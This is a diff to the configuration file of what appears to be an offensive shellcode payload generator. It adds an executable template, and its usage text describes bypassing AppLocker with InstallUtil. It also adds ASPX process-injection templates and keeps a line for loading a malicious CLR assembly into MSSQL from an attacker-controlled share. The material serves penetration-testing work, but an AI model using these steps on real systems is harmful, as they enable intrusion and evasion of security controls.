--- a/core/config/config.ini
+++ b/core/config/config.ini
@@ -117,7 +117,11 @@ output_format = .dll
 compiler_args = -r:System.Data
 custom_output = After enabling CLR, Load the DLL in MSSQL as follows: \nCREATE ASSEMBLY my_run FROM '\\<ATTACKING_IP>\fileserver\evil-sc.dll' WITH PERMISSION_SET = UNSAFE; \nCREATE PROCEDURE [dbo].[CustSQLRunner] AS EXTERNAL NAME [my_run].[StoredProcedures].[CustSQLRunner]; \nCustSQLRunner  \nFor more details: https://red.infiltr8.io/web-pentesting/infrastructures/dbms/exploit-databases#custom-clr-assemblies
 
-
+[windows_cs:MockingJay]
+expected_format = RAW_BIN
+output_format = .exe
+compiler_args = -r:System.Configuration.Install
+custom_output = You may run this payload normaly: "evil-sc.exe" \nOr using installUtil to bypass AppLocker: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false evil-sc.exe"
 
 [windows_js:VenomaToJs]
 expected_format = RAW_BIN
@@ -150,6 +154,18 @@ output_format = .vba
 [windows_vba:Runner]
 expected_format = RAW_BIN
 output_format = .vba
+
+[windows_aspx:NtMapViewOfSection]
+expected_format = RAW_BIN
+output_format = .aspx
+
+[windows_aspx:CreateRemoteThread]
+expected_format = RAW_BIN
+output_format = .aspx
+
+[windows_aspx:CreateThread]
+expected_format = RAW_BIN
+output_format = .aspx
 
 [linux:SimpleExec]
 expected_format = RAW_BIN
